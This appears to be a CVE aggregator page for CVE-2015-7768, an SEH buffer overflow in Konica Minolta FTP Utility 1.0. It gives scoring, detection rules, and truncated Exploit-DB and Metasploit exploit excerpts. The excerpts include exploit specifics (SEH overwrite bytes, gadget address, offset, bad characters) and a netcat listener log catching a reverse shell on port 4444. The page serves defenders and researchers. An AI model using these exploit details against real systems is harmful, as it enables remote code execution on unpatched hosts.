CVE-2015-7768
published 2015-10-09CVE-2015-7768: Buffer overflow in Konica Minolta FTP Utility 1.0 allows remote attackers to execute arbitrary code via a long CWD command.
PriorityP265high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
63.21%
99.1th percentile
Buffer overflow in Konica Minolta FTP Utility 1.0 allows remote attackers to execute arbitrary code via a long CWD command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| konicaminolta | ftp_utility | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x0a\x90\x90 (nSEH jump) + \x9D\x6D\x20\x12 (SEH handler, KMFtpCM.dll PPR)
- →Detect oversized FTP CWD commands (>1037 bytes) sent to port 21, indicative of SEH overflow exploitation against Konica Minolta FTP Utility 1.00. ↗
- →Match FTP banner string 'FTP Utility FTP server (Version 1.00)' to identify vulnerable Konica Minolta FTP instances. ↗
- →Alert on anonymous FTP login followed immediately by a CWD command with a payload exceeding ~1037 bytes, as the exploit uses anonymous credentials by default. ↗
- →Look for the SEH overwrite byte sequence \xeb\x0a\x90\x90 (short jump nSEH) followed by \x9d\x6d\x20\x12 (PPR gadget in KMFtpCM.dll) within FTP CWD command payloads. ↗
- →Monitor for outbound reverse shell connections on port 4444 originating from the FTP Utility process (KMFtpCM.dll / FTP Utility host) post-exploitation. ↗
- ·The SEH return address (PPR gadget 0x12206d9d) is hardcoded to KMFtpCM.dll and is only valid for the Windows 7 SP1 x86 target; different OS/patch levels will require a different gadget address. ↗
- ·The exploit offset of 1037 bytes before the SEH record is specific to Konica Minolta FTP Utility version 1.00 on Windows 7 SP1 x86; other versions or platforms may differ. ↗
- ·Bad characters \x00, \x0a, \x2f, \x5c must be avoided in shellcode; the PoC also excludes \x0d, \x3d in its encoder invocation. ↗
- ·Payload space is limited to 1500 bytes within the CWD overflow buffer for this exploit configuration. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
exploitdb·2016-01-11
CVE-2015-7768 Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)
---
# Title: Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow.
# Date : 01/08/2016
# Author: TOMIWA.
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows 7 SP1 64bits
# Listen for a reverse netcat connection on port 4444
# root@kali:~# nc -nlvp 4444
# listening on [any] 4444 ...
# connect to [192.168.0.11] from (UNKNOWN) [192.168.0.109] 49158
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.
# C:\Program Files (x86)\KONICA MINOLTA\FTP Utility>
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7A
Exploit-DB
Konica Minolta FTP Utility 1.00 - (Authenticated) CWD Command Overflow (SEH) (Metasploit)
exploitdb·2015-09-21
CVE-2015-7768 Konica Minolta FTP Utility 1.00 - (Authenticated) CWD Command Overflow (SEH) (Metasploit)
Konica Minolta FTP Utility 1.00 - (Authenticated) CWD Command Overflow (SEH) (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
'Description' => %q{
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.
Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
leads to an SEH overflow. Konica FTP allows anonymous access by default; valid
credentials are typically unnecessary to exploit this vulnerability.
},
'Author' =>
[
'Shankar Damodaran', # stack buffer overflow dos p.o.c
'Muhamad Fadzil Ramli ' # seh overflow, metasploit module
],
'Lic
Metasploit
Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow
metasploit
Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow
Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which leads to an SEH overflow. Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/133621/Konica-Minolta-FTP-Utility-1.00-Post-Auth-CWD-Command-SEH-Overflow.htmlhttp://packetstormsecurity.com/files/137252/Konica-Minolta-FTP-Utility-1.0-SEH-Buffer-Overflow.htmlhttp://www.rapid7.com/db/modules/exploit/windows/ftp/kmftp_utility_cwdhttps://www.exploit-db.com/exploits/38254/https://www.exploit-db.com/exploits/39215/http://packetstormsecurity.com/files/133621/Konica-Minolta-FTP-Utility-1.00-Post-Auth-CWD-Command-SEH-Overflow.htmlhttp://packetstormsecurity.com/files/137252/Konica-Minolta-FTP-Utility-1.0-SEH-Buffer-Overflow.htmlhttp://www.rapid7.com/db/modules/exploit/windows/ftp/kmftp_utility_cwdhttps://www.exploit-db.com/exploits/38254/https://www.exploit-db.com/exploits/39215/
2015-10-09
Published